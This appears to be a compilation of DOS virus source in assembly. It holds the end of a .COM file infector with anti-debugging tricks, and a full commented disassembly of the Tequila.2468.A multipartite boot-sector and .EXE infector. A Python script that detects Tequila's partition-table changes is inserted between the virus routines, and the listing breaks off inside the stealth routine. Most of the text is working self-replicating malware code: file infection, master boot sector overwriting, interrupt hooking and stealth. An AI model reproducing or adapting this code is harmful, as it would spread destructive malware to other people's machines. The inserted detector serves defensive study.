Check_Timer:    IN AX, 40h              ; Get a random value.

                ADD AL, AH              ; 1/256 chance of displaying
                JNZ Check_Debugger      ; text message.

                MOV AH, 0Eh
                MOV SI, OFFSET Message

Display_Char:   SEGCS                   ; Fetch next encrypted byte.
                LODSB

                XOR AL, 66h             ; Displayed all so far?
                JZ Check_Debugger       ; Then bail.

                INT 10h                 ; BIOS display character.

                JMP Display_Char        ; Go on.

Check_Debugger: XOR DI, DI


                MOV DS, DI              ; Get 1st instruction of
                LDS SI, DS:[DI+(01h*4)] ; INT 01h.
                LODSB

                MOV AH, AL              ; Save it in AH.

                MOV DS, DI              ; Get 1st instruction of
                LDS SI, DS:[DI+(03h*4)] ; INT 03h.
                LODSB

                XOR AX, 0CFCFh          ; If they're not IRET then
                JNZ Trash_Boot          ; a debugger has hooked them.

Check_Caller:   INT 01h                 ; Annoying break.

                JMP $                   ; Bail if we're busy already.
Busy_Switch     = BYTE PTR $-1

                INC CS:Int_Count        ; Only examine INTs randomly
                JS Exit_ISR             ; to prevent slowdowns.
                JP Exit_ISR

                MOV BP, SP
                MOV DS, [BP+(11*2)]     ; DS = CS of calling INT 21h.

                XCHG SI, AX             ; SI = 0.

                CMP DS:[SI], 20CDh      ; Verify it's a .COM-PSP.
                JNE Exit_ISR

; Set the busy flag so we don't get interrupted.

                MOV CS:Busy_Switch, (Exit_ISR - Busy_Switch) - 1

                MOV AH, 62h             ; Get current PSP.
                INT 66h

                CMP BX, [BP+(11*2)]     ; Caller's CS == PSP ?
                JNE Clear_Busy          ; Else it ain't no .COM.

                IN AX, 40h              ; Get a random number.
                ADD AL, AH

                CMP AL, 150             ; Infect the program here?
                JNB Clear_Busy          ; Nope, maybe next time.

                MOV DS, DS:[SI+2Ch]     ; .COM's environment block.

Scan_For_Name:  LODSW                   ; Scan for the end of all
                DEC SI                  ; settings, after which
                                        ; the full path to the
                OR AX, AX               ; currently executing program
                JNZ Scan_For_Name       ; resides.

                CALL Infect_File

Clear_Busy:     AND CS:Busy_Switch, 0   ; Open for business again..

Exit_ISR:       POP ES                  ; Restore the regs.
                POP DS
                POPA

Do_Old_Int21h:  INT 66h                 ; Call the original INT 21h.


                RETF 2                  ; And return with new flags.

Seek_EOF:       MOV AX, 4202h           ; Seek to the end of file.
                XOR CX, CX
                CWD
                INT 66h

                DB 0CDh, 03h            ; Annoying break.

Do_RETN:        RETN

Infect_File:    MOV AX, 4300h           ; Get file's attributes.
                LEA DX, [SI+3]
                INT 66h
                JC Do_RETN

                IN AL, 21h              ; Lock the keyboard.
                OR AL, 00000010b
                OUT 21h, AL

                INT 01h                 ; Hang the possible debugger.

                PUSH DS                 ; Save path and attributes.
                PUSH DX
                PUSH CX

                AND CL, 00000110b       ; Leave system & hidden files
                JZ Clear_Readonly       ; alone (and clear r/o bit).

JMP_Nop_Attr:   JMP Nop_Attr_Rest       ; Fix stack but don't restore
                                        ; attributes.

Clear_Readonly: MOV AX, 4301h           ; Clear possible r/o bit.
                INT 66h
                JC JMP_Nop_Attr

                MOV AX, 3D02h           ; Open file for read/write.
                INT 66h
                JNC Save_Handle

                JMP Restore_Attr

Save_Handle:    XCHG BX, AX             ; Save filehandle in BX.

                PUSH CS
                POP DS

                MOV SI, OFFSET Header

                MOV AH, 3Fh             ; Read first 4 bytes of .COM.
                MOV CL, 4
                MOV DX, SI
                INT 66h
                JNC Verify_Read

JMP_Close_File: JMP Close_File

Verify_Read:    CMP AX, CX              ; All 4 bytes were read?


                JNE JMP_Close_File

                CALL Seek_EOF           ; Get filesize.

                DEC DX                  ; .COM is over 64k ?
                JNS JMP_Close_File      ; Then bail, obviously.

                CMP AX, (63*1024)       ; .COM is too big?
                JA JMP_Close_File

                CMP AX, (4*1024)        ; Or too small?
                JB JMP_Close_File

                INC WORD PTR [SI+2]     ; Don't infect .SYS-files.
                JZ JMP_Close_File

                CMP [SI], 'ZM' + 1      ; Ditto for .EXE-files.
                JE JMP_Close_File

                CMP [SI], 'MZ' + 1
                JE JMP_Close_File

                MOV AX, 4202h           ; Seek to the last 7 bytes
                DEC CX                  ; of the .COM-file, this
                MOV DL, -7              ; is where the possible
                INT 66h                 ; ENUNS-string is located.

; My Win98 .COM-files have the ENUNS changed to NLDNS, so just
; checking for ENUNS would not work with these. Just treat every
; .COM-file as an ENUNS protected file and you're all set.

                MOV AH, 3Fh
                MOV CX, 7
                MOV DX, OFFSET Checksum_ID
                INT 66h

; Adjust the file's checksum.

                ADD Checksum_Word, Virus_Size

                CALL Seek_EOF

                LES DI, [BP+(2*10)]     ; ES:DI = CS:IP of the next
                                        ; instruction in the target.

                MOV DX, DI
                DEC DH                  ; Minus PSP (100h).

                CMP DX, AX              ; IP points into the image?
                JNB JMP_Close_File      ; Else bail out.

                SUB AX, DX              ; Calculate displacement.
                SUB AX, 3

                MOV BP, OFFSET CALL_Virus

                MOV CS:[BP+1], AX       ; CALL_Virus displacement.

                PUSH DX

                MOV AX, 4200h           ; Seek to the insert offset.
                XOR CX, CX
                INT 66h


                MOV SI, OFFSET Header

                MOV AH, 3Fh             ; Read the original bytes.
                MOV CL, 3
                MOV DX, SI
                INT 66h

                POP DX

                CMPSB                   ; Code in memory is the same
                JNE Close_File          ; as on disk?

                CMPSW                   ; This avoids infecting
                JNE Close_File          ; packed files, etc.

                SUB SI, 3

                LODSB                   ; Get 1st byte, encrypt and
                NOT AL                  ; save it.
                MOV Host_Byte, AL

                LODSW                   ; Do the same with the next
                DEC AX                  ; word.
                MOV Host_Word, AX

                MOV AX, 4200h           ; Seek to the insert offset
                XOR CX, CX              ; again.
                INT 66h

                MOV AX, 5700h           ; Get file's date & time.
                INT 66h
                JC Close_File

                MOV AL, CL              ; Mask-out seconds.
                AND AL, 00011111b

                CMP AL, (6/2)           ; 6 seconds (infected) ?
                JE Close_File           ; Then abort.

                XCHG CX, AX             ; Put CX in AX.

                AND AL, 11100000b       ; Clear seconds field.
                OR AL, (6/2)            ; Set 6 seconds.

                PUSH AX                 ; Save the file date & time
                PUSH DX                 ; on the stack for later.

                MOV AH, 40h             ; Write the CALL_Virus into
                MOV CX, 3               ; the file.
                MOV DX, BP
                INT 66h
                JC Restore_Date

                CALL Seek_EOF

                MOV AH, 40h             ; Append virusbody to the
                MOV CX, Virus_Size      ; target file. (DX=0).
                INT 66h

Restore_Date:   MOV AX, 5701h           ; Restore file date & time.
                POP DX
                POP CX


                INT 66h

Close_File:     MOV AH, 3Eh             ; Close the file.
                INT 66h

Restore_Attr:   MOV AX, 4301h           ; Restore file's attributes.
                CMP AX, 0
                ORG $-2

Nop_Attr_Rest:  MOV AH, 19h             ; Nop (get current drive).
                POP CX
                POP DX
                POP DS
                INT 66h

Exit_Infect:    CMP AX, 545Bh           ; Executable text string,
                XOR CH, [BX]            ; '=[T2/IR]='. Very effective
                DEC CX                  ; against lame text patching.
                PUSH DX
                POP BP
                CMP AX, 0DEADh

                IN AL, 21h              ; Reverse state of keyboard,
                XOR AL, 00000010b       ; it'll lock if a debugger
                OUT 21h, AL             ; has skipped the 1st lock.

                INT 03h                 ; Hang the possible debugger.

                RETN

CALL_Virus      DB 0E8h                 ; CALL opcode.
                DW 0

Checksum_ID     DB 5 DUP(0)             ; Usually 'ENUNS'.
Checksum_Word   DW 666                  ; Checksum itself.

End_Body:

Int_Count       DB 0
Header          DB 4 DUP(0)

End_Heap:                               ; So it's lame.. a lame virus for a lame person..
                                        ; Haven't bothered optimizing the code structure to
                                        ; the max, no time nor desire, sorry.. Remember, this
                                        ; is just a demonstration virus....

; Amen.

                END START


; Tequila.2468.A (exact) disasm.
; Multipartite semi-stealth polymorphic MBS & .EXE-infector.
; Bugs marked with '***'.
; T-2000/IR, March 2000.

                .MODEL TINY

                .STACK 512

                .CODE

Virus_Size      EQU (End_Body - START)
Virus_Size_512  EQU ((End_Body - START) + 511) / 512
Virus_Size_1024 EQU ((End_Body - START) + 1023) / 1024
Virus_Size_Mem  EQU ((End_Heap - START) + 15) / 16

START:

Host_IP         DW OFFSET Carrier
Host_CS         DW (256 / 16)
Host_SS         DW (256 / 16)

Infect_Year     DW 0                    ; Year of MBS infection.
Infect_MD       DW 0                    ; Month & day of MBS infection.

Tunnel_Success  DB 0                    ; DOS' INT 13h found boolean.

Word_16         DW 16                   ; Used for MUL/DIV operations.
Word_512        DW 512
Word_250        DW 250
Byte_12         DB 12

Message         DB 0Dh, 0Ah, 0Dh, 0Ah
                DB 'Welcome to T.TEQUILA''s latest production.', 0Dh, 0Ah
                DB 'Contact T.TEQUILA/P.o.Box 543/6312 St''hausen/Switzerland.', 0Dh, 0Ah
                DB 'Loving thoughts to L.I.N.D.A', 0Dh, 0Ah, 0Dh, 0Ah
                DB 'BEER and TEQUILA forever !', 0Dh, 0Ah, 0Dh, 0Ah, '$'

Hint            DB 'Execute: mov ax, FE03 / int 21. Key to go on!'

; Tequila's activation routine, it's supposed to activate on the same day
; as the MBS infection took place, 3 or more months later, when it will
; draw a colorful mandelbrot set consisting out of ASCII characters, and
; display a message.

Check_Activate: PUSH BP

                MOV BP, SP

                SUB SP, (6*2)           ; Reserve 12 bytes on the
                                        ; stack.

                PUSH AX
                PUSH BX
                PUSH CX
                PUSH DX
                PUSH SI
                PUSH DI
                PUSH ES
                PUSH DS

                PUSH CS
                POP DS

                MOV AX, Infect_Year     ; Year of MBS infection.


                INC AX                  ; Skip all further checks?
                JZ JMP_Exit_Act         ; Yep.

                DEC AX                  ; We're in countdown mode?
                JNZ Check_Date          ; Nope.

                DEC Infect_MD           ; 3 program exits so far?
                JNZ JMP_Exit_Act        ; Else bug out.

                JMP Init_Video_Seg      ; Do the effect.

Check_Date:     MOV AH, 2Ah             ; Get the current date.
                CALL Do_Old_Int21h

                MOV SI, CX              ; SI = year count.

                MOV CX, Infect_MD

                CMP CL, DL              ; Same day as infection?
                JNE Disable_Check

                MOV AX, SI              ; AX = current year count.

                SUB AX, Infect_Year     ; Minus the year count of
                                        ; MBS infection.

                MUL Byte_12             ; Calculate total count of
                                        ; months in year count.

                ADD AL, DH              ; Plus current month.
                                        ; AL = amount of months since
                                        ; MBS infection took place.

                ADD CH, 3               ; Infection date + 3 months.

                CMP AL, CH              ; 3 months have passed?
                JAE Enable_Call         ; Then enable the payload.

Disable_Check:  MOV Infect_Year, -1     ; Don't check the date
                JMP JMP_Exit_Act        ; anymore.

Enable_Call:    MOV Infect_Year, 0      ; Signal that the payload
                                        ; can activate and the 0FE03h
                                        ; call can be accepted.

                MOV Infect_MD, 3        ; Countdown timer, wait 3
                                        ; program exits before
                                        ; activation.

JMP_Exit_Act:   JMP Exit_Activate

Init_Video_Seg: MOV BX, 0B800h          ; VGA video segment.

                INT 11h                 ; Get equipment status.

                AND AX, 0000000000110000b ; Mask out video state.

                CMP AX, 0000000000110000b ; 80x25 monochrome?
                JNE Set_Video_Seg

                MOV BX, 0B000h          ; Monochrome video segment.

Set_Video_Seg:  MOV ES, BX


; I didn't bother commenting the effect as I don't have a clue of what the
; fuck it's doing. Besides, graphical payloads are for lamers anyways....

                XOR BX, BX

                MOV DI, 0FD8Fh

LOC_9:          MOV SI, 0FC18h

LOC_10:         MOV [BP-(1*2)], SI
                MOV [BP-(2*2)], DI

                MOV CX, 30

LOCLOOP_11:     MOV AX, [BP-(1*2)]
                IMUL AX                 ; dx:ax = reg * ax

                MOV [BP-(4*2)], AX
                MOV [BP-(3*2)], DX

                MOV AX, [BP-(2*2)]
                IMUL AX                 ; dx:ax = reg * ax

                MOV [BP-(6*2)], AX
                MOV [BP-(5*2)], DX

                ADD AX, [BP-(4*2)]
                ADC DX, [BP-(3*2)]

                CMP DX, 15
                JAE LOC_12

                MOV AX, [BP-(1*2)]
                IMUL WORD PTR [BP-(2*2)] ; dx:ax = data * ax
                IDIV Word_250           ; ax,dxrem=dx:ax/data

                ADD AX, DI
                MOV [BP-(2*2)], AX

                MOV AX, [BP-(4*2)]
                MOV DX, [BP-(3*2)]

                SUB AX, [BP-(6*2)]
                SBB DX, [BP-(5*2)]
                IDIV Word_512

                ADD AX, SI
                MOV [BP-(1*2)], AX

                LOOP LOCLOOP_11

LOC_12:         INC CX
                SHR CL, 1

                MOV CH, CL
                MOV CL, 0DBh
                MOV ES:[BX], CX

                INC BX
                INC BX

                ADD SI, 18


                CMP SI, 1B8h
                JL LOC_10

                ADD DI, 52

                CMP DI, 2A3h
                JL LOC_9

                XOR DI, DI              ; Display the hint on screen.
                MOV SI, OFFSET Hint
                MOV CX, (Check_Activate - Hint)
                CLD

Write_Char:     MOVSB                   ; Put a byte in video RAM.
                INC DI                  ; Don't change the attribute.

                LOOP Write_Char         ; Do the entire string.

                XOR AX, AX              ; Wait for a keypress.
                INT 16h

Exit_Activate:  POP DS
                POP ES
                POP DI
                POP SI
                POP DX
                POP CX
                POP BX
                POP AX

                MOV SP, BP
                POP BP

                RETN

; This displays Tequila's message.
Display_Message:
                PUSH DX
                PUSH DS

                PUSH CS
                POP DS

                MOV AH, 09h             ; Display string.
                MOV DX, OFFSET Message
                CALL Do_Old_Int21h

                POP DS
                POP DX

                RETN

; This gets inserted into MBS'ses.
MBS_Loader:
                CLI

                XOR BX, BX              ; Zero DS.
                MOV DS, BX

                MOV SS, BX              ; Setup a stack.
                MOV SP, 7C00h


                STI

                XOR DI, DI

; Steal 3k of DOS memory to go resident into.

                SUB WORD PTR DS:[413h], Virus_Size_1024
                INT 12h

                MOV CL, 6               ; Calculate segment to go
                SHL AX, CL              ; resident into.

                MOV ES, AX              ; Push relocated address.
                PUSH ES

                MOV AX, OFFSET Relocated_Boot
                PUSH AX

; Read the virusbody off disk.

                MOV AX, 0200h + Virus_Size_512
                MOV CX, DS:[7C00h + (Home_ST - MBS_Loader)]

                INC CX
                MOV DX, DS:[7C00h + (Home_HD - MBS_Loader)]
                INT 13h

                RETF                    ; Jump to the relocated code.

ID_Word         DW 0FE02h               ; Already-infected-tag.

Home_ST         DW 0                    ; Sector/track of virusbody.
Home_HD         DW 0                    ; Head/drive of virusbody.

Relocated_Boot: PUSH CS
                POP DS

                XOR AX, AX              ; Zero ES.
                MOV ES, AX

                MOV BX, 7C00h

                PUSH ES                 ; ES:BX = 0000:7C00, boot
                PUSH BX                 ; address.

                MOV AX, 0201h           ; Read the original MBS from
                MOV CX, Home_ST         ; disk.
                MOV DX, Home_HD
                INT 13h

                PUSH CS
                POP ES

; Create a copy of the INT 13h ISR, and the
; body encryptor & appender, as the virus will
; encrypt the runtime code when it infects a file
; so it doesn't have to use a separate buffer.

                CLD
                MOV SI, OFFSET New_Int13h
                MOV DI, OFFSET New_Int13h_Copy
                MOV CX, (New_Int1Ch - New_Int13h)
                REP MOVSB


                MOV SI, OFFSET Append_Body_Encrypted
                MOV DI, OFFSET Append_Body_Encrypted_Copy
                MOV CX, (Decryptor - Append_Body_Encrypted)
                REP MOVSB

                CLI

                XOR AX, AX              ; ES = IVT.
                MOV ES, AX

                LES BX, ES:[(1Ch*4)]    ; Get INT 1Ch (timer).

                MOV Old_Int1Ch, BX      ; Save INT 1Ch.
                MOV Old_Int1Ch+2, ES

                MOV ES, AX              ; ES = IVT.

                LES BX, ES:[(21h*4)]    ; Get INT 21h.

                MOV Old_Int21h, BX      ; Save INT 21h as well.
                MOV Old_Int21h+2, ES

                MOV ES, AX              ; ES = IVT.

; Hook INT 1Ch.

                MOV ES:[(1Ch*4)], OFFSET New_Int1Ch
                MOV ES:[(1Ch*4)+2], DS

                STI

                RETF                    ; Jump to the original MBS.

; This is where the polymorphic decryptor jumps
; to after it's done decrypting the virusbody.

Init_Virus:     CALL Get_IP             ; Calculate the virus'

Get_IP:         POP SI                  ; delta offset in this CS.
                SUB SI, OFFSET Get_IP

                PUSH SI                 ; Save some needed registers.
                PUSH AX
                PUSH ES

                PUSH CS
                POP DS

                MOV AX, ES              ; AX = current PSP.

; Add the effective segment (PSP) to the segment values.

                ADD [SI+(Host_CS - START)], AX
                ADD [SI+(Host_SS - START)], AX

                DEC AX                  ; Get the host's MCB in ES.
                MOV ES, AX

                MOV AX, 0FE02h          ; Virus' residency check.
                INT 21h


                CMP AX, NOT 0FE02h      ; Virus is already installed?
                JE Run_Host             ; Then just bail to the host.

                CMP BYTE PTR ES:[0], 'Z' ; Make sure this block is the
                JNE Run_Host            ; last one in the chain, else
                                        ; higher blocks might get
                                        ; damaged.

; Make sure the memory block holds enough
; space to put the viruscode in.

                CMP WORD PTR ES:[3], Virus_Size_Mem
                JBE Run_Host

                MOV AX, ES:[12h]        ; PSP:[2], holds TOM segment.
                SUB AX, Virus_Size_Mem  ; Minus the virus' size to
                                        ; get the virus segment.

                MOV ES, AX              ; Virus segment.

                XOR DI, DI              ; Relocate the viruscode to
                MOV CX, Virus_Size      ; the newly calculated
                CLD                     ; unused segment.
                REP MOVSB

                PUSH ES                 ; DS = virus segment.
                POP DS

                CALL Infect_MBS         ; Infect the 1st MBS.

Run_Host:       POP ES                  ; Restore ES (PSP).
                POP AX                  ; Restore AX (FCB status).

                PUSH ES                 ; DS=ES=PSP.
                POP DS

                POP SI                  ; Restore virus delta offset.

; Restore the host's original SS.

                MOV SS, CS:[SI+(Host_SS - START)]

; And jump to the host's original entrypoint.

                JMP DWORD PTR CS:[SI+(Host_IP - START)]

Infect_MBS:     MOV AH, 2Ah             ; Get the current date.
                INT 21h

                MOV Infect_Year, CX     ; Store date of infection.
                MOV Infect_MD, DX

                MOV AH, 52h             ; Get M$-DOS list of lists.
                INT 21h                 ; (undocumented).

                MOV AX, ES:[BX-2]       ; Get segment of 1st MCB.
                MOV First_MCB, AX       ; And save it for tunneler.

                MOV AX, 3513h           ; Get INT 13h.
                INT 21h


                MOV Old_Int13h, BX      ; Save INT 13h.
                MOV Old_Int13h+2, ES

                MOV AX, 3501h           ; Get INT 01h.
                INT 21h

                MOV SI, BX              ; Save INT 01h in DI:SI.
                MOV DI, ES

                MOV AX, 2501h           ; Put in the tunneler.
                MOV DX, OFFSET New_Int01h
                INT 21h

                MOV Tunnel_Success, 0   ; Initialize as 'not found'.

                PUSHF                   ; Set the trapflag (TF).
                POP AX

                OR AX, 100h
                PUSH AX

                POPF

                MOV AX, 0201h           ; Read the MBS of HD 1.
                MOV BX, OFFSET Buffer
                MOV CX, 1
                MOV DX, 80h

                PUSH DS
                POP ES

                PUSHF                   ; Call INT 13h while tracing.
                CALL DWORD PTR Old_Int13h

                PUSHF                   ; Disable the TF in case
                POP AX                  ; INT 13h wasn't found.
                AND AX, NOT 100h

                PUSH AX
                POPF

                PUSHF

                MOV AX, 2501h           ; Restore original INT 01h.
                MOV DX, SI
                MOV DS, DI
                INT 21h

                POPF                    ; Flags after the MBS read.
                JNC Check_MBS           ; If error, then bail out.

                JMP Exit_Inf_MBS

Check_MBS:      PUSH ES                 ; ES = virus segment.
                POP DS

; Check if the MBS is already infected.

                CMP [BX+(ID_Word - MBS_Loader)], 0FE02h
                JNE Find_DOS_Part

                JMP Exit_Inf_MBS

; This locates a DOS partition.

Find_DOS_Part:  ADD BX, 1BEh            ; BX = begin partition table.


                MOV CX, 4               ; Maximum of 4 partitions.

Scan_Partition: MOV AL, [BX+4]          ; Get the partition's system
                                        ; indicator.

                CMP AL, 4               ; DOS 16-bit FAT ?
                JE Store_Home

                CMP AL, 6               ; DOS > 32M ?
                JE Store_Home

                CMP AL, 1               ; DOS 12-bit FAT ?
                JE Store_Home

                ADD BX, 16              ; Next partition.

                LOOP Scan_Partition     ; Loop to the next partition.

                JMP Exit_Inf_MBS        ; None found.

Store_Home:     MOV DL, 80h             ; First harddisk.
                MOV DH, [BX+5]          ; Last head of DOS partition.

                MOV Home_HD, DX         ; Store virus' home
                                        ; drive & head.

                MOV AX, [BX+6]          ; Last sector & track of
                                        ; DOS partition.

                MOV CX, AX
                MOV SI, Virus_Size_512 + 1 ; Virus sectors + old MBS.

                AND AX, 0000000000111111b ; Strip track count to get
                                        ; the last track sector.

                CMP AX, SI              ; There's enough space on
                JBE Exit_Inf_MBS        ; this track for the virus?

                SUB CX, SI              ; Steal needed sectors from
                                        ; the partition's last track.

                MOV DI, BX
                INC CX

                MOV Home_ST, CX

                MOV AX, 0301h           ; Store the MBS on the stolen
                MOV BX, OFFSET Buffer   ; partition sectors.

                PUSHF
                CALL DWORD PTR Old_Int13h
                JC Exit_Inf_MBS

                DEC CX                  ; Adjust the DOS partition
                MOV [DI+6], CX          ; to have 6 sectors less.

                INC CX

                SUB [DI+12], SI         ; Adjust the partition sector
                SBB WORD PTR [DI+12+2], 0 ; count as well.

; Write the virusbody to the stolen sectors.

                MOV AX, 0300h + Virus_Size_512
                MOV BX, 0


                INC CX

                PUSHF                   ; INT 13h.
                CALL DWORD PTR Old_Int13h
                JC Exit_Inf_MBS

; Copy the virus MBS loader into the MBS.

                MOV SI, OFFSET MBS_Loader
                MOV DI, OFFSET Buffer
                MOV CX, (Relocated_Boot - MBS_Loader)
                CLD
                REP MOVSB

                MOV AX, 0301h           ; Write the infected MBS
                MOV BX, OFFSET Buffer   ; to disk.
                MOV CX, 1
                XOR DH, DH

                PUSHF                   ; INT 13h.
                CALL DWORD PTR Old_Int13h

Exit_Inf_MBS:   RETN
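Infect_MBS above takes Virus_Size_512 + 1 sectors off the end of the first DOS partition (the end-CHS word at entry offset 6 and the sector count at offset 12) and leaves the 0FE02h tag word in the boot code. The following Python is an added example for this page, not code from the article or from Tequila: it parses a 512-byte MBR partition table and reports the trace that modification leaves, a partition that no longer ends on its last track's final sector. The geometry (16 heads, 63 sectors per track) and the one-partition sample MBR are constructed for the demonstration.

```python
"""Partition-table checks for the end-of-partition sector theft described in
Infect_MBS.  Added example for this page (not the article's or Tequila's code);
the disk geometry and the sample MBR are constructed inputs."""
import struct

PART_TABLE_OFF = 0x1BE               # four 16-byte entries start here
BOOT_SIG_OFF = 0x1FE                 # 55 AA
TAG_WORD = struct.pack("<H", 0xFE02) # ID_Word the loader keeps in the MBS


def decode_chs(raw):
    """3-byte table field: head, sector (low 6 bits) | cylinder high bits, cylinder low byte."""
    cylinder = ((raw[1] & 0xC0) << 2) | raw[2]
    return cylinder, raw[0], raw[1] & 0x3F


def encode_chs(cylinder, head, sector):
    return bytes([head, (sector & 0x3F) | ((cylinder >> 2) & 0xC0), cylinder & 0xFF])


def chs_to_lba(chs, heads, spt):
    cylinder, head, sector = chs
    return (cylinder * heads + head) * spt + (sector - 1)


def parse_partitions(mbr):
    """Return the non-empty partition entries as dicts."""
    if len(mbr) != 512 or mbr[BOOT_SIG_OFF:] != b"\x55\xaa":
        raise ValueError("expected a 512-byte sector ending in 55AA")
    entries = []
    for i in range(4):
        off = PART_TABLE_OFF + 16 * i
        ptype = mbr[off + 4]
        if ptype == 0:
            continue
        lba_start, lba_size = struct.unpack_from("<II", mbr, off + 8)
        entries.append({"index": i, "type": ptype,
                        "start_chs": decode_chs(mbr[off + 1:off + 4]),
                        "end_chs": decode_chs(mbr[off + 5:off + 8]),
                        "lba_start": lba_start, "lba_size": lba_size})
    return entries


def check_mbr(mbr, heads, spt):
    """Return a list of findings (empty when the table looks normal)."""
    findings = []
    if TAG_WORD in mbr[:PART_TABLE_OFF]:
        findings.append("boot code contains the FE02h tag word (weak indicator on its own)")
    for p in parse_partitions(mbr):
        _, _, end_sector = p["end_chs"]
        # DOS-era partitions end on the last sector of a track; the routine above
        # shortens exactly that field, so a short last track is the tell-tale.
        if end_sector != spt:
            findings.append(f"partition {p['index']}: ends on sector {end_sector} of its last "
                            f"track, {spt - end_sector} sector(s) before the track end")
        # CHS end and LBA extent should describe the same sector.  The routine
        # adjusts both fields, so this check alone would NOT catch it.
        if chs_to_lba(p["end_chs"], heads, spt) != p["lba_start"] + p["lba_size"] - 1:
            findings.append(f"partition {p['index']}: end CHS disagrees with LBA start + size")
    return findings


def build_sample_mbr(end_sector, lba_size):
    """Constructed MBR with one FAT16 entry and no boot code (test input only)."""
    mbr = bytearray(512)
    entry = (bytes([0x80]) + encode_chs(0, 1, 1) + bytes([0x06])
             + encode_chs(99, 15, end_sector) + struct.pack("<II", 63, lba_size))
    mbr[PART_TABLE_OFF:PART_TABLE_OFF + 16] = entry
    mbr[BOOT_SIG_OFF:] = b"\x55\xaa"
    return bytes(mbr)


# Clean: partition ends on sector 63 of cylinder 99, head 15 (geometry 16 x 63).
# Modified: six sectors taken off both the end-CHS field and the size, the way
# the routine does it, so the two fields still agree.
CLEAN_MBR = build_sample_mbr(63, 100737)
MODIFIED_MBR = build_sample_mbr(57, 100731)

if __name__ == "__main__":
    for label, mbr in (("clean", CLEAN_MBR), ("modified", MODIFIED_MBR)):
        print(label, check_mbr(mbr, heads=16, spt=63) or ["no findings"])
```

On a real disk image the geometry comes from the BIOS/translation the system used when the table was written; the track-boundary check is the one that matters, because the routine keeps the CHS and LBA fields mutually consistent.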

New_Int01h:     PUSH BP                 ; Setup a stack pointer.
                MOV BP, SP

                CMP CS:Tunnel_Success, 1 ; Tunnel already finished?
                JE Clear_TF             ; *** Pointless code, since
                                        ; the TF is already cleared.

                CMP [BP+(2*2)], 1234h   ; We're in the DOS kernel?
First_MCB       = WORD PTR $-2

                JA Exit_Int01h

                PUSH AX
                PUSH ES

                LES AX, [BP+(1*2)]      ; Get instruction's CS:IP.

                MOV CS:Old_Int13h, AX   ; Save it.
                MOV CS:Old_Int13h+2, ES

                MOV CS:Tunnel_Success, 1 ; Mark tunnel successful.

                POP ES
                POP AX

Clear_TF:       AND [BP+(3*2)], NOT 100h ; Disable the trapflag.

Exit_Int01h:    POP BP

                IRET

New_Int13h:     CMP CX, 1               ; Track 0, sector 1 ?
                JNE JMP_Old_Int13h

                CMP DX, 80h             ; Head 0, of the 1st HD ?
                JNE JMP_Old_Int13h


                CMP AH, 03h             ; Is it a sector write?
                JA JMP_Old_Int13h

                CMP AH, 02h             ; Or a sector read?
                JB JMP_Old_Int13h

                PUSH CX
                PUSH DX

                DEC AL                  ; Only the MBS gets read?
                JZ Read_Orig_MBS

                PUSH AX
                PUSH BX

                ADD BX, 512             ; Next sector in buffer.
                INC CX                  ; Next sector.

                PUSHF                   ; Process the other sectors
                CALL DWORD PTR CS:Old_Int13h ; first, so the MBS action
                                        ; can be redirected to the
                                        ; clean one.

                POP BX
                POP AX

Read_Orig_MBS:  MOV AL, 1               ; Just the MBS.

                MOV CX, CS:Home_ST      ; Load address of original
                MOV DX, CS:Home_HD      ; MBS.

                PUSHF                   ; Read/write the original
                CALL DWORD PTR CS:Old_Int13h ; MBS.

                POP DX
                POP CX

                RETF 2                  ; Return with flags.

JMP_Old_Int13h: JMP DWORD PTR CS:Old_Int13h

New_Int1Ch:     PUSH AX
                PUSH BX
                PUSH ES
                PUSH DS

                XOR AX, AX              ; ES = IVT.
                MOV ES, AX

                PUSH CS
                POP DS

                LES BX, ES:[(21h*4)]    ; Get INT 21h.

                MOV AX, ES              ; AX = segment of INT 21h.

                CMP AX, 800h            ; Is it too high?
                JA Exit_Int1Ch          ; Then assume DOS ain't
                                        ; loaded yet.

                CMP AX, Old_Int21h+2    ; Has the DOS segment


                JNE Save_Int21h         ; changed since boot-up?

                CMP BX, Old_Int21h      ; Has the DOS offset changed
                JE Exit_Int1Ch          ; since boot-up?

Save_Int21h:    MOV Old_Int21h, BX      ; Save INT 21h.
                MOV Old_Int21h+2, ES

                XOR AX, AX              ; DS = IVT.
                MOV DS, AX

                LES BX, DWORD PTR CS:Old_Int1Ch

                MOV DS:[(1Ch*4)], BX    ; Restore original INT 1Ch.
                MOV DS:[(1Ch*4)+2], ES

                LES BX, DS:[(13h*4)]    ; Get INT 13h.

                MOV CS:Old_Int13h, BX   ; Save INT 13h.
                MOV CS:Old_Int13h+2, ES

; Hook INT 13h.

                MOV DS:[(13h*4)], OFFSET New_Int13h_Copy
                MOV DS:[(13h*4)+2], CS

; Hook INT 21h.

                MOV DS:[(21h*4)], OFFSET New_Int21h
                MOV DS:[(21h*4)+2], CS

Exit_Int1Ch:    POP DS
                POP ES
                POP BX
                POP AX

                IRET

New_Int21h:     CMP AH, 11h             ; Findfirst (FCB) ?
                JB Check_Dir_St

                CMP AH, 12h             ; Findnext (FCB) ?
                JA Check_Dir_St

                CALL FCB_Stealth        ; Carry-out the FCB stealth.

                RETF 2                  ; Return with flags.

Check_Dir_St:   CMP AH, 4Eh             ; Findfirst (dir) ?
                JB Check_TSR_Test

                CMP AH, 4Fh             ; Findnext (dir) ?
                JA Check_TSR_Test

                CALL Dir_Stealth        ; Carry-out the dir stealth.

                RETF 2                  ; Return with flags.

Check_TSR_Test: CMP AX, 0FE02h          ; Virus' residency check?
                JNE Check_Message


                NOT AX                  ; Return TSR mark.

                IRET                    ; Return to the caller.

Check_Message:  CMP AX, 0FE03h          ; Call to display message?
                JNE Check_Exec

                CMP CS:Infect_Year, 0   ; The date was correct?
                JNZ JMP_Old_Int21h      ; Else just ignore the call.

                CALL Display_Message

                IRET

Check_Exec:     CMP AX, 4B00h           ; Program execute?
                JE Init_Stack

                CMP AH, 4Ch             ; Program terminate?
                JNE JMP_Old_Int21h

Init_Stack:     MOV CS:Old_SP, SP       ; Save the current stack.
                MOV CS:Old_SS, SS

                CLI                     ; Setup own stack.
                PUSH CS
                POP SS

                MOV SP, OFFSET Validate_Header + 128
                STI

                CMP AH, 4Ch             ; Was it program terminate?
                JNE Do_Infect_File

                CALL Check_Activate

                JMP Restore_Stack

Do_Infect_File: CALL Infect_File

Restore_Stack:  CLI                     ; Restore the original stack.
                MOV SS, CS:Old_SS
                MOV SP, CS:Old_SP
                STI

                JMP $+2                 ; *** Pointless instruction.

JMP_Old_Int21h: INC CS:Int_Count        ; Update random counter.

                JMP DWORD PTR CS:Old_Int21h

New_Int24h:     MOV AL, 03h             ; Fail operation.
                IRET

FCB_Stealth:    PUSH BX
                PUSH ES
